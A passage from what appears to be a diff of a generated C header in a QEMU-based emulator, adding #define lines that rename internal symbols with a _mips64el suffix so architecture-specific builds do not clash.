helper_vfp_cmpd helper_vfp_cmpd_mips64el +#define helper_vfp_cmped helper_vfp_cmped_mips64el +#define helper_vfp_cmpes helper_vfp_cmpes_mips64el +#define helper_vfp_cmps helper_vfp_cmps_mips64el +#define helper_vfp_divd helper_vfp_divd_mips64el +#define helper_vfp_divs helper_vfp_divs_mips64el +#define helper_vfp_fcvtds helper_vfp_fcvtds_mips64el +#define helper_vfp_fcvt_f16_to_f32 helper_vfp_fcvt_f16_to_f32_mips64el +#define helper_vfp_fcvt_f16_to_f64 helper_vfp_fcvt_f16_to_f64_mips64el +#define helper_vfp_fcvt_f32_to_f16 helper_vfp_fcvt_f32_to_f16_mips64el +#define helper_vfp_fcvt_f64_to_f16 helper_vfp_fcvt_f64_to_f16_mips64el +#define helper_vfp_fcvtsd helper_vfp_fcvtsd_mips64el +#define helper_vfp_get_fpscr helper_vfp_get_fpscr_mips64el +#define helper_vfp_maxd helper_vfp_maxd_mips64el +#define helper_vfp_maxnumd helper_vfp_maxnumd_mips64el +#define helper_vfp_maxnums helper_vfp_maxnums_mips64el +#define helper_vfp_maxs helper_vfp_maxs_mips64el +#define helper_vfp_mind helper_vfp_mind_mips64el +#define helper_vfp_minnumd helper_vfp_minnumd_mips64el +#define helper_vfp_minnums helper_vfp_minnums_mips64el +#define helper_vfp_mins helper_vfp_mins_mips64el +#define helper_vfp_muladdd helper_vfp_muladdd_mips64el +#define helper_vfp_muladds helper_vfp_muladds_mips64el +#define helper_vfp_muld helper_vfp_muld_mips64el +#define helper_vfp_muls helper_vfp_muls_mips64el +#define helper_vfp_negd helper_vfp_negd_mips64el +#define helper_vfp_negs helper_vfp_negs_mips64el +#define helper_vfp_set_fpscr helper_vfp_set_fpscr_mips64el +#define helper_vfp_shtod helper_vfp_shtod_mips64el +#define helper_vfp_shtos helper_vfp_shtos_mips64el +#define helper_vfp_sitod helper_vfp_sitod_mips64el +#define helper_vfp_sitos helper_vfp_sitos_mips64el +#define helper_vfp_sltod helper_vfp_sltod_mips64el +#define helper_vfp_sltos helper_vfp_sltos_mips64el +#define helper_vfp_sqrtd helper_vfp_sqrtd_mips64el +#define helper_vfp_sqrts helper_vfp_sqrts_mips64el +#define helper_vfp_sqtod 
helper_vfp_sqtod_mips64el +#define helper_vfp_sqtos helper_vfp_sqtos_mips64el +#define helper_vfp_subd helper_vfp_subd_mips64el +#define helper_vfp_subs helper_vfp_subs_mips64el +#define helper_vfp_toshd helper_vfp_toshd_mips64el +#define helper_vfp_toshd_round_to_zero helper_vfp_toshd_round_to_zero_mips64el +#define helper_vfp_toshs helper_vfp_toshs_mips64el +#define helper_vfp_toshs_round_to_zero helper_vfp_toshs_round_to_zero_mips64el +#define helper_vfp_tosid helper_vfp_tosid_mips64el +#define helper_vfp_tosis helper_vfp_tosis_mips64el +#define helper_vfp_tosizd helper_vfp_tosizd_mips64el +#define helper_vfp_tosizs helper_vfp_tosizs_mips64el +#define helper_vfp_tosld helper_vfp_tosld_mips64el +#define helper_vfp_tosld_round_to_zero helper_vfp_tosld_round_to_zero_mips64el +#define helper_vfp_tosls helper_vfp_tosls_mips64el +#define helper_vfp_tosls_round_to_zero helper_vfp_tosls_round_to_zero_mips64el +#define helper_vfp_tosqd helper_vfp_tosqd_mips64el +#define helper_vfp_tosqs helper_vfp_tosqs_mips64el +#define helper_vfp_touhd helper_vfp_touhd_mips64el +#define helper_vfp_touhd_round_to_zero helper_vfp_touhd_round_to_zero_mips64el +#define helper_vfp_touhs helper_vfp_touhs_mips64el +#define helper_vfp_touhs_round_to_zero helper_vfp_touhs_round_to_zero_mips64el +#define helper_vfp_touid helper_vfp_touid_mips64el +#define helper_vfp_touis helper_vfp_touis_mips64el +#define helper_vfp_touizd helper_vfp_touizd_mips64el +#define helper_vfp_touizs helper_vfp_touizs_mips64el +#define helper_vfp_tould helper_vfp_tould_mips64el +#define helper_vfp_tould_round_to_zero helper_vfp_tould_round_to_zero_mips64el +#define helper_vfp_touls helper_vfp_touls_mips64el +#define helper_vfp_touls_round_to_zero helper_vfp_touls_round_to_zero_mips64el +#define helper_vfp_touqd helper_vfp_touqd_mips64el +#define helper_vfp_touqs helper_vfp_touqs_mips64el +#define helper_vfp_uhtod helper_vfp_uhtod_mips64el +#define helper_vfp_uhtos helper_vfp_uhtos_mips64el +#define helper_vfp_uitod 
helper_vfp_uitod_mips64el +#define helper_vfp_uitos helper_vfp_uitos_mips64el +#define helper_vfp_ultod helper_vfp_ultod_mips64el +#define helper_vfp_ultos helper_vfp_ultos_mips64el +#define helper_vfp_uqtod helper_vfp_uqtod_mips64el +#define helper_vfp_uqtos helper_vfp_uqtos_mips64el +#define helper_wfe helper_wfe_mips64el +#define helper_wfi helper_wfi_mips64el +#define hex2decimal hex2decimal_mips64el +#define hw_breakpoint_update hw_breakpoint_update_mips64el +#define hw_breakpoint_update_all hw_breakpoint_update_all_mips64el +#define hw_watchpoint_update hw_watchpoint_update_mips64el +#define hw_watchpoint_update_all hw_watchpoint_update_all_mips64el +#define _init _init_mips64el +#define init_cpreg_list init_cpreg_list_mips64el +#define init_lists init_lists_mips64el +#define input_type_enum input_type_enum_mips64el +#define int128_2_64 int128_2_64_mips64el +#define int128_add int128_add_mips64el +#define int128_addto int128_addto_mips64el +#define int128_and int128_and_mips64el +#define int128_eq int128_eq_mips64el +#define int128_ge int128_ge_mips64el +#define int128_get64 int128_get64_mips64el +#define int128_gt int128_gt_mips64el +#define int128_le int128_le_mips64el +#define int128_lt int128_lt_mips64el +#define int128_make64 int128_make64_mips64el +#define int128_max int128_max_mips64el +#define int128_min int128_min_mips64el +#define int128_ne int128_ne_mips64el +#define int128_neg int128_neg_mips64el +#define int128_nz int128_nz_mips64el +#define int128_rshift int128_rshift_mips64el +#define int128_sub int128_sub_mips64el +#define int128_subfrom int128_subfrom_mips64el +#define int128_zero int128_zero_mips64el +#define int16_to_float32 int16_to_float32_mips64el +#define int16_to_float64 int16_to_float64_mips64el +#define int32_to_float128 int32_to_float128_mips64el +#define int32_to_float32 int32_to_float32_mips64el +#define int32_to_float64 int32_to_float64_mips64el +#define int32_to_floatx80 int32_to_floatx80_mips64el +#define int64_to_float128 
int64_to_float128_mips64el +#define int64_to_float32 int64_to_float32_mips64el +#define int64_to_float64 int64_to_float64_mips64el +#define int64_to_floatx80 int64_to_floatx80_mips64el +#define invalidate_and_set_dirty invalidate_and_set_dirty_mips64el +#define invalidate_page_bitmap invalidate_page_bitmap_mips64el +#define io_mem_read io_mem_read_mips64el +#define io_mem_write io_mem_write_mips64el +#define io_readb io_readb_mips64el +#define io_readl io_readl_mips64el +#define io_readq io_readq_mips64el +#define io_readw io_readw_mips64el +#define iotlb_to_region iotlb_to_region_mips64el +#define io_writeb io_writeb_mips64el +#define io_writel io_writel_mips64el +#define io_writeq io_writeq_mips64el +#define io_writew io_writew_mips64el +#define is_a64 is_a64_mips64el +#define is_help_option is_help_option_mips64el +#define isr_read isr_read_mips64el +#define is_valid_option_list is_valid_option_list_mips64el +#define iwmmxt_load_creg iwmmxt_load_creg_mips64el +#define iwmmxt_load_reg iwmmxt_load_reg_mips64el +#define iwmmxt_store_creg iwmmxt_store_creg_mips64el +#define iwmmxt_store_reg iwmmxt_store_reg_mips64el +#define __jit_debug_descriptor __jit_debug_descriptor_mips64el +#define __jit_debug_register_code __jit_debug_register_code_mips64el +#define kvm_to_cpreg_id kvm_to_cpreg_id_mips64el +#define last_ram_offset last_ram_offset_mips64el +#define ldl_be_p ldl_be_p_mips64el +#define ldl_be_phys ldl_be_phys_mips64el +#define ldl_he_p ldl_he_p_mips64el +#define ldl_le_p ldl_le_p_mips64el +#define ldl_le_phys ldl_le_phys_mips64el +#define ldl_phys ldl_phys_mips64el +#define ldl_phys_internal ldl_phys_internal_mips64el +#define ldq_be_p ldq_be_p_mips64el +#define ldq_be_phys ldq_be_phys_mips64el +#define ldq_he_p ldq_he_p_mips64el +#define ldq_le_p ldq_le_p_mips64el +#define ldq_le_phys ldq_le_phys_mips64el +#define ldq_phys ldq_phys_mips64el +#define ldq_phys_internal ldq_phys_internal_mips64el +#define ldst_name ldst_name_mips64el +#define ldub_p 
ldub_p_mips64el +#define ldub_phys ldub_phys_mips64el +#define lduw_be_p lduw_be_p_mips64el +#define lduw_be_phys lduw_be_phys_mips64el +#define lduw_he_p lduw_he_p_mips64el +#define lduw_le_p lduw_le_p_mips64el +#define lduw_le_phys lduw_le_phys_mips64el +#define lduw_phys lduw_phys_mips64el +#define lduw_phys_internal lduw_phys_internal_mips64el +#define le128 le128_mips64el +#define linked_bp_matches linked_bp_matches_mips64el +#define listener_add_address_space listener_add_address_space_mips64el +#define load_cpu_offset load_cpu_offset_mips64el +#define load_reg load_reg_mips64el +#define load_reg_var load_reg_var_mips64el +#define log_cpu_state log_cpu_state_mips64el +#define lpae_cp_reginfo lpae_cp_reginfo_mips64el +#define lt128 lt128_mips64el +#define machine_class_init machine_class_init_mips64el +#define machine_finalize machine_finalize_mips64el +#define machine_info machine_info_mips64el +#define machine_initfn machine_initfn_mips64el +#define machine_register_types machine_register_types_mips64el +#define machvirt_init machvirt_init_mips64el +#define machvirt_machine_init machvirt_machine_init_mips64el +#define maj maj_mips64el +#define mapping_conflict mapping_conflict_mips64el +#define mapping_contiguous mapping_contiguous_mips64el +#define mapping_have_same_region mapping_have_same_region_mips64el +#define mapping_merge mapping_merge_mips64el +#define mem_add mem_add_mips64el +#define mem_begin mem_begin_mips64el +#define mem_commit mem_commit_mips64el +#define memory_access_is_direct memory_access_is_direct_mips64el +#define memory_access_size memory_access_size_mips64el +#define memory_init memory_init_mips64el +#define memory_listener_match memory_listener_match_mips64el +#define memory_listener_register memory_listener_register_mips64el +#define memory_listener_unregister memory_listener_unregister_mips64el +#define memory_map_init memory_map_init_mips64el +#define memory_mapping_filter memory_mapping_filter_mips64el +#define 
memory_mapping_list_add_mapping_sorted memory_mapping_list_add_mapping_sorted_mips64el +#define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_mips64el +#define memory_mapping_list_free memory_mapping_list_free_mips64el +#define memory_mapping_list_init memory_mapping_list_init_mips64el +#define memory_region_access_valid memory_region_access_valid_mips64el +#define memory_region_add_subregion memory_region_add_subregion_mips64el +#define memory_region_add_subregion_common memory_region_add_subregion_common_mips64el +#define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_mips64el +#define memory_region_big_endian memory_region_big_endian_mips64el +#define memory_region_clear_pending memory_region_clear_pending_mips64el +#define memory_region_del_subregion memory_region_del_subregion_mips64el +#define memory_region_destructor_alias memory_region_destructor_alias_mips64el +#define memory_region_destructor_none memory_region_destructor_none_mips64el +#define memory_region_destructor_ram memory_region_destructor_ram_mips64el +#define memory_region_destructor_ram_from_ptr memory_region_destructor_ram_from_ptr_mips64el +#define memory_region_dispatch_read memory_region_dispatch_read_mips64el +#define memory_region_dispatch_read1 memory_region_dispatch_read1_mips64el +#define memory_region_dispatch_write memory_region_dispatch_write_mips64el +#define memory_region_escape_name memory_region_escape_name_mips64el +#define memory_region_finalize memory_region_finalize_mips64el +#define memory_region_find memory_region_find_mips64el +#define memory_region_get_addr memory_region_get_addr_mips64el +#define memory_region_get_alignment memory_region_get_alignment_mips64el +#define memory_region_get_container memory_region_get_container_mips64el +#define memory_region_get_fd memory_region_get_fd_mips64el +#define memory_region_get_may_overlap memory_region_get_may_overlap_mips64el +#define memory_region_get_priority 
memory_region_get_priority_mips64el +#define memory_region_get_ram_addr memory_region_get_ram_addr_mips64el +#define memory_region_get_ram_ptr memory_region_get_ram_ptr_mips64el +#define memory_region_get_size memory_region_get_size_mips64el +#define memory_region_info memory_region_info_mips64el +#define memory_region_init memory_region_init_mips64el +#define memory_region_init_alias memory_region_init_alias_mips64el +#define memory_region_initfn memory_region_initfn_mips64el +#define memory_region_init_io memory_region_init_io_mips64el +#define memory_region_init_ram memory_region_init_ram_mips64el +#define memory_region_init_ram_ptr memory_region_init_ram_ptr_mips64el +#define memory_region_init_reservation memory_region_init_reservation_mips64el +#define memory_region_is_iommu memory_region_is_iommu_mips64el +#define memory_region_is_logging memory_region_is_logging_mips64el +#define memory_region_is_mapped memory_region_is_mapped_mips64el +#define memory_region_is_ram memory_region_is_ram_mips64el +#define memory_region_is_rom memory_region_is_rom_mips64el +#define memory_region_is_romd memory_region_is_romd_mips64el +#define memory_region_is_skip_dump memory_region_is_skip_dump_mips64el +#define memory_region_is_unassigned memory_region_is_unassigned_mips64el +#define memory_region_name memory_region_name_mips64el +#define memory_region_need_escape memory_region_need_escape_mips64el +#define memory_region_oldmmio_read_accessor memory_region_oldmmio_read_accessor_mips64el +#define memory_region_oldmmio_write_accessor memory_region_oldmmio_write_accessor_mips64el +#define memory_region_present memory_region_present_mips64el +#define memory_region_read_accessor memory_region_read_accessor_mips64el +#define memory_region_readd_subregion memory_region_readd_subregion_mips64el +#define memory_region_ref memory_region_ref_mips64el +#define memory_region_resolve_container memory_region_resolve_container_mips64el +#define memory_region_rom_device_set_romd 
memory_region_rom_device_set_romd_mips64el +#define memory_region_section_get_iotlb memory_region_section_get_iotlb_mips64el +#define memory_region_set_address memory_region_set_address_mips64el +#define memory_region_set_alias_offset memory_region_set_alias_offset_mips64el +#define memory_region_set_enabled memory_region_set_enabled_mips64el +#define memory_region_set_readonly memory_region_set_readonly_mips64el +#define memory_region_set_skip_dump memory_region_set_skip_dump_mips64el +#define memory_region_size memory_region_size_mips64el +#define memory_region_to_address_space memory_region_to_address_space_mips64el +#define memory_region_transaction_begin memory_region_transaction_begin_mips64el +#define memory_region_transaction_commit memory_region_transaction_commit_mips64el +#define memory_region_unref memory_region_unref_mips64el +#define memory_region_update_container_subregions memory_region_update_container_subregions_mips64el +#define memory_region_write_accessor memory_region_write_accessor_mips64el +#define memory_region_wrong_endianness memory_region_wrong_endianness_mips64el +#define memory_try_enable_merging memory_try_enable_merging_mips64el +#define module_call_init module_call_init_mips64el +#define module_load module_load_mips64el +#define mpidr_cp_reginfo mpidr_cp_reginfo_mips64el +#define mpidr_read mpidr_read_mips64el +#define msr_mask msr_mask_mips64el +#define mul128By64To192 mul128By64To192_mips64el +#define mul128To256 mul128To256_mips64el +#define mul64To128 mul64To128_mips64el +#define muldiv64 muldiv64_mips64el +#define neon_2rm_is_float_op neon_2rm_is_float_op_mips64el +#define neon_2rm_sizes neon_2rm_sizes_mips64el +#define neon_3r_sizes neon_3r_sizes_mips64el +#define neon_get_scalar neon_get_scalar_mips64el +#define neon_load_reg neon_load_reg_mips64el +#define neon_load_reg64 neon_load_reg64_mips64el +#define neon_load_scratch neon_load_scratch_mips64el +#define neon_ls_element_type neon_ls_element_type_mips64el +#define 
neon_reg_offset neon_reg_offset_mips64el +#define neon_store_reg neon_store_reg_mips64el +#define neon_store_reg64 neon_store_reg64_mips64el +#define neon_store_scratch neon_store_scratch_mips64el +#define new_ldst_label new_ldst_label_mips64el +#define next_list next_list_mips64el +#define normalizeFloat128Subnormal normalizeFloat128Subnormal_mips64el +#define normalizeFloat16Subnormal normalizeFloat16Subnormal_mips64el +#define normalizeFloat32Subnormal normalizeFloat32Subnormal_mips64el +#define normalizeFloat64Subnormal normalizeFloat64Subnormal_mips64el +#define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_mips64el +#define normalizeRoundAndPackFloat128 normalizeRoundAndPackFloat128_mips64el +#define normalizeRoundAndPackFloat32 normalizeRoundAndPackFloat32_mips64el +#define normalizeRoundAndPackFloat64 normalizeRoundAndPackFloat64_mips64el +#define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_mips64el +#define not_v6_cp_reginfo not_v6_cp_reginfo_mips64el +#define not_v7_cp_reginfo not_v7_cp_reginfo_mips64el +#define not_v8_cp_reginfo not_v8_cp_reginfo_mips64el +#define object_child_foreach object_child_foreach_mips64el +#define object_class_foreach object_class_foreach_mips64el +#define object_class_foreach_tramp object_class_foreach_tramp_mips64el +#define object_class_get_list object_class_get_list_mips64el +#define object_class_get_list_tramp object_class_get_list_tramp_mips64el +#define object_class_get_parent object_class_get_parent_mips64el +#define object_deinit object_deinit_mips64el +#define object_dynamic_cast object_dynamic_cast_mips64el +#define object_finalize object_finalize_mips64el +#define object_finalize_child_property object_finalize_child_property_mips64el +#define object_get_child_property object_get_child_property_mips64el +#define object_get_link_property object_get_link_property_mips64el +#define object_get_root object_get_root_mips64el +#define object_initialize_with_type object_initialize_with_type_mips64el 
+#define object_init_with_type object_init_with_type_mips64el +#define object_instance_init object_instance_init_mips64el +#define object_new_with_type object_new_with_type_mips64el +#define object_post_init_with_type object_post_init_with_type_mips64el +#define object_property_add_alias object_property_add_alias_mips64el +#define object_property_add_link object_property_add_link_mips64el +#define object_property_add_uint16_ptr object_property_add_uint16_ptr_mips64el +#define object_property_add_uint32_ptr object_property_add_uint32_ptr_mips64el +#define object_property_add_uint64_ptr object_property_add_uint64_ptr_mips64el +#define object_property_add_uint8_ptr object_property_add_uint8_ptr_mips64el +#define object_property_allow_set_link object_property_allow_set_link_mips64el +#define object_property_del object_property_del_mips64el +#define object_property_del_all object_property_del_all_mips64el +#define object_property_find object_property_find_mips64el +#define object_property_get object_property_get_mips64el +#define object_property_get_bool object_property_get_bool_mips64el +#define object_property_get_int object_property_get_int_mips64el +#define object_property_get_link object_property_get_link_mips64el +#define object_property_get_qobject object_property_get_qobject_mips64el +#define object_property_get_str object_property_get_str_mips64el +#define object_property_get_type object_property_get_type_mips64el +#define object_property_is_child object_property_is_child_mips64el +#define object_property_set object_property_set_mips64el +#define object_property_set_description object_property_set_description_mips64el +#define object_property_set_link object_property_set_link_mips64el +#define object_property_set_qobject object_property_set_qobject_mips64el +#define object_release_link_property object_release_link_property_mips64el +#define object_resolve_abs_path object_resolve_abs_path_mips64el +#define object_resolve_child_property 
object_resolve_child_property_mips64el +#define object_resolve_link object_resolve_link_mips64el +#define object_resolve_link_property object_resolve_link_property_mips64el +#define object_resolve_partial_path object_resolve_partial_path_mips64el +#define object_resolve_path object_resolve_path_mips64el +#define object_resolve_path_component object_resolve_path_component_mips64el +#define object_resolve_path_type object_resolve_path_type_mips64el +#define object_set_link_property object_set_link_property_mips64el +#define object_unparent object_unparent_mips64el +#define omap_cachemaint_write omap_cachemaint_write_mips64el +#define omap_cp_reginfo omap_cp_reginfo_mips64el +#define omap_threadid_write omap_threadid_write_mips64el +#define omap_ticonfig_write omap_ticonfig_write_mips64el +#define omap_wfi_write omap_wfi_write_mips64el +#define op_bits op_bits_mips64el +#define open_modeflags open_modeflags_mips64el +#define op_to_mov op_to_mov_mips64el +#define op_to_movi op_to_movi_mips64el +#define output_type_enum output_type_enum_mips64el +#define packFloat128 packFloat128_mips64el +#define packFloat16 packFloat16_mips64el +#define packFloat32 packFloat32_mips64el +#define packFloat64 packFloat64_mips64el +#define packFloatx80 packFloatx80_mips64el +#define page_find page_find_mips64el +#define page_find_alloc page_find_alloc_mips64el +#define page_flush_tb page_flush_tb_mips64el +#define page_flush_tb_1 page_flush_tb_1_mips64el +#define page_init page_init_mips64el +#define page_size_init page_size_init_mips64el +#define par par_mips64el +#define parse_array parse_array_mips64el +#define parse_error parse_error_mips64el +#define parse_escape parse_escape_mips64el +#define parse_keyword parse_keyword_mips64el +#define parse_literal parse_literal_mips64el +#define parse_object parse_object_mips64el +#define parse_optional parse_optional_mips64el +#define parse_option_bool parse_option_bool_mips64el +#define parse_option_number parse_option_number_mips64el +#define 
parse_option_size parse_option_size_mips64el +#define parse_pair parse_pair_mips64el +#define parser_context_free parser_context_free_mips64el +#define parser_context_new parser_context_new_mips64el +#define parser_context_peek_token parser_context_peek_token_mips64el +#define parser_context_pop_token parser_context_pop_token_mips64el +#define parser_context_restore parser_context_restore_mips64el +#define parser_context_save parser_context_save_mips64el +#define parse_str parse_str_mips64el +#define parse_type_bool parse_type_bool_mips64el +#define parse_type_int parse_type_int_mips64el +#define parse_type_number parse_type_number_mips64el +#define parse_type_size parse_type_size_mips64el +#define parse_type_str parse_type_str_mips64el +#define parse_value parse_value_mips64el +#define par_write par_write_mips64el +#define patch_reloc patch_reloc_mips64el +#define phys_map_node_alloc phys_map_node_alloc_mips64el +#define phys_map_node_reserve phys_map_node_reserve_mips64el +#define phys_mem_alloc phys_mem_alloc_mips64el +#define phys_mem_set_alloc phys_mem_set_alloc_mips64el +#define phys_page_compact phys_page_compact_mips64el +#define phys_page_compact_all phys_page_compact_all_mips64el +#define phys_page_find phys_page_find_mips64el +#define phys_page_set phys_page_set_mips64el +#define phys_page_set_level phys_page_set_level_mips64el +#define phys_section_add phys_section_add_mips64el +#define phys_section_destroy phys_section_destroy_mips64el +#define phys_sections_free phys_sections_free_mips64el +#define pickNaN pickNaN_mips64el +#define pickNaNMulAdd pickNaNMulAdd_mips64el +#define pmccfiltr_write pmccfiltr_write_mips64el +#define pmccntr_read pmccntr_read_mips64el +#define pmccntr_sync pmccntr_sync_mips64el +#define pmccntr_write pmccntr_write_mips64el +#define pmccntr_write32 pmccntr_write32_mips64el +#define pmcntenclr_write pmcntenclr_write_mips64el +#define pmcntenset_write pmcntenset_write_mips64el +#define pmcr_write pmcr_write_mips64el +#define 
pmintenclr_write pmintenclr_write_mips64el +#define pmintenset_write pmintenset_write_mips64el +#define pmovsr_write pmovsr_write_mips64el +#define pmreg_access pmreg_access_mips64el +#define pmsav5_cp_reginfo pmsav5_cp_reginfo_mips64el +#define pmsav5_data_ap_read pmsav5_data_ap_read_mips64el +#define pmsav5_data_ap_write pmsav5_data_ap_write_mips64el +#define pmsav5_insn_ap_read pmsav5_insn_ap_read_mips64el +#define pmsav5_insn_ap_write pmsav5_insn_ap_write_mips64el +#define pmuserenr_write pmuserenr_write_mips64el +#define pmxevtyper_write pmxevtyper_write_mips64el +#define print_type_bool print_type_bool_mips64el +#define print_type_int print_type_int_mips64el +#define print_type_number print_type_number_mips64el +#define print_type_size print_type_size_mips64el +#define print_type_str print_type_str_mips64el +#define propagateFloat128NaN propagateFloat128NaN_mips64el +#define propagateFloat32MulAddNaN propagateFloat32MulAddNaN_mips64el +#define propagateFloat32NaN propagateFloat32NaN_mips64el +#define propagateFloat64MulAddNaN propagateFloat64MulAddNaN_mips64el +#define propagateFloat64NaN propagateFloat64NaN_mips64el +#define propagateFloatx80NaN propagateFloatx80NaN_mips64el +#define property_get_alias property_get_alias_mips64el +#define property_get_bool property_get_bool_mips64el +#define property_get_str property_get_str_mips64el +#define property_get_uint16_ptr property_get_uint16_ptr_mips64el +#define property_get_uint32_ptr property_get_uint32_ptr_mips64el +#define property_get_uint64_ptr property_get_uint64_ptr_mips64el +#define property_get_uint8_ptr property_get_uint8_ptr_mips64el +#define property_release_alias property_release_alias_mips64el +#define property_release_bool property_release_bool_mips64el +#define property_release_str property_release_str_mips64el +#define property_resolve_alias property_resolve_alias_mips64el +#define property_set_alias property_set_alias_mips64el +#define property_set_bool property_set_bool_mips64el +#define 
property_set_str property_set_str_mips64el +#define pstate_read pstate_read_mips64el +#define pstate_write pstate_write_mips64el +#define pxa250_initfn pxa250_initfn_mips64el +#define pxa255_initfn pxa255_initfn_mips64el +#define pxa260_initfn pxa260_initfn_mips64el +#define pxa261_initfn pxa261_initfn_mips64el +#define pxa262_initfn pxa262_initfn_mips64el +#define pxa270a0_initfn pxa270a0_initfn_mips64el +#define pxa270a1_initfn pxa270a1_initfn_mips64el +#define pxa270b0_initfn pxa270b0_initfn_mips64el +#define pxa270b1_initfn pxa270b1_initfn_mips64el +#define pxa270c0_initfn pxa270c0_initfn_mips64el +#define pxa270c5_initfn pxa270c5_initfn_mips64el +#define qapi_dealloc_end_implicit_struct qapi_dealloc_end_implicit_struct_mips64el +#define qapi_dealloc_end_list qapi_dealloc_end_list_mips64el +#define qapi_dealloc_end_struct qapi_dealloc_end_struct_mips64el +#define qapi_dealloc_get_visitor qapi_dealloc_get_visitor_mips64el +#define qapi_dealloc_next_list qapi_dealloc_next_list_mips64el +#define qapi_dealloc_pop qapi_dealloc_pop_mips64el +#define qapi_dealloc_push qapi_dealloc_push_mips64el +#define qapi_dealloc_start_implicit_struct qapi_dealloc_start_implicit_struct_mips64el +#define qapi_dealloc_start_list qapi_dealloc_start_list_mips64el +#define qapi_dealloc_start_struct qapi_dealloc_start_struct_mips64el +#define qapi_dealloc_start_union qapi_dealloc_start_union_mips64el +#define qapi_dealloc_type_bool qapi_dealloc_type_bool_mips64el +#define qapi_dealloc_type_enum qapi_dealloc_type_enum_mips64el +#define qapi_dealloc_type_int qapi_dealloc_type_int_mips64el +#define qapi_dealloc_type_number qapi_dealloc_type_number_mips64el +#define qapi_dealloc_type_size qapi_dealloc_type_size_mips64el +#define qapi_dealloc_type_str qapi_dealloc_type_str_mips64el +#define qapi_dealloc_visitor_cleanup qapi_dealloc_visitor_cleanup_mips64el +#define qapi_dealloc_visitor_new qapi_dealloc_visitor_new_mips64el +#define qapi_free_boolList qapi_free_boolList_mips64el +#define 
qapi_free_ErrorClassList qapi_free_ErrorClassList_mips64el +#define qapi_free_int16List qapi_free_int16List_mips64el +#define qapi_free_int32List qapi_free_int32List_mips64el +#define qapi_free_int64List qapi_free_int64List_mips64el +#define qapi_free_int8List qapi_free_int8List_mips64el +#define qapi_free_intList qapi_free_intList_mips64el +#define qapi_free_numberList qapi_free_numberList_mips64el +#define qapi_free_strList qapi_free_strList_mips64el +#define qapi_free_uint16List qapi_free_uint16List_mips64el +#define qapi_free_uint32List qapi_free_uint32List_mips64el +#define qapi_free_uint64List qapi_free_uint64List_mips64el +#define qapi_free_uint8List qapi_free_uint8List_mips64el +#define qapi_free_X86CPUFeatureWordInfo qapi_free_X86CPUFeatureWordInfo_mips64el +#define qapi_free_X86CPUFeatureWordInfoList qapi_free_X86CPUFeatureWordInfoList_mips64el +#define qapi_free_X86CPURegister32List qapi_free_X86CPURegister32List_mips64el +#define qbool_destroy_obj qbool_destroy_obj_mips64el +#define qbool_from_int qbool_from_int_mips64el +#define qbool_get_int qbool_get_int_mips64el +#define qbool_type qbool_type_mips64el +#define qbus_create qbus_create_mips64el +#define qbus_create_inplace qbus_create_inplace_mips64el +#define qbus_finalize qbus_finalize_mips64el +#define qbus_initfn qbus_initfn_mips64el +#define qbus_realize qbus_realize_mips64el +#define qdev_create qdev_create_mips64el +#define qdev_get_type qdev_get_type_mips64el +#define qdev_register_types qdev_register_types_mips64el +#define qdev_set_parent_bus qdev_set_parent_bus_mips64el +#define qdev_try_create qdev_try_create_mips64el +#define qdict_add_key qdict_add_key_mips64el +#define qdict_array_split qdict_array_split_mips64el +#define qdict_clone_shallow qdict_clone_shallow_mips64el +#define qdict_del qdict_del_mips64el +#define qdict_destroy_obj qdict_destroy_obj_mips64el +#define qdict_entry_key qdict_entry_key_mips64el +#define qdict_entry_value qdict_entry_value_mips64el +#define 
qdict_extract_subqdict qdict_extract_subqdict_mips64el +#define qdict_find qdict_find_mips64el +#define qdict_first qdict_first_mips64el +#define qdict_flatten qdict_flatten_mips64el +#define qdict_flatten_qdict qdict_flatten_qdict_mips64el +#define qdict_flatten_qlist qdict_flatten_qlist_mips64el +#define qdict_get qdict_get_mips64el +#define qdict_get_bool qdict_get_bool_mips64el +#define qdict_get_double qdict_get_double_mips64el +#define qdict_get_int qdict_get_int_mips64el +#define qdict_get_obj qdict_get_obj_mips64el +#define qdict_get_qdict qdict_get_qdict_mips64el +#define qdict_get_qlist qdict_get_qlist_mips64el +#define qdict_get_str qdict_get_str_mips64el +#define qdict_get_try_bool qdict_get_try_bool_mips64el +#define qdict_get_try_int qdict_get_try_int_mips64el +#define qdict_get_try_str qdict_get_try_str_mips64el +#define qdict_haskey qdict_haskey_mips64el +#define qdict_has_prefixed_entries qdict_has_prefixed_entries_mips64el +#define qdict_iter qdict_iter_mips64el +#define qdict_join qdict_join_mips64el +#define qdict_new qdict_new_mips64el +#define qdict_next qdict_next_mips64el +#define qdict_next_entry qdict_next_entry_mips64el +#define qdict_put_obj qdict_put_obj_mips64el +#define qdict_size qdict_size_mips64el +#define qdict_type qdict_type_mips64el +#define qemu_clock_get_us qemu_clock_get_us_mips64el +#define qemu_clock_ptr qemu_clock_ptr_mips64el +#define qemu_clocks qemu_clocks_mips64el +#define qemu_get_cpu qemu_get_cpu_mips64el +#define qemu_get_guest_memory_mapping qemu_get_guest_memory_mapping_mips64el +#define qemu_get_guest_simple_memory_mapping qemu_get_guest_simple_memory_mapping_mips64el +#define qemu_get_ram_block qemu_get_ram_block_mips64el +#define qemu_get_ram_block_host_ptr qemu_get_ram_block_host_ptr_mips64el +#define qemu_get_ram_fd qemu_get_ram_fd_mips64el +#define qemu_get_ram_ptr qemu_get_ram_ptr_mips64el +#define qemu_host_page_mask qemu_host_page_mask_mips64el +#define qemu_host_page_size qemu_host_page_size_mips64el 
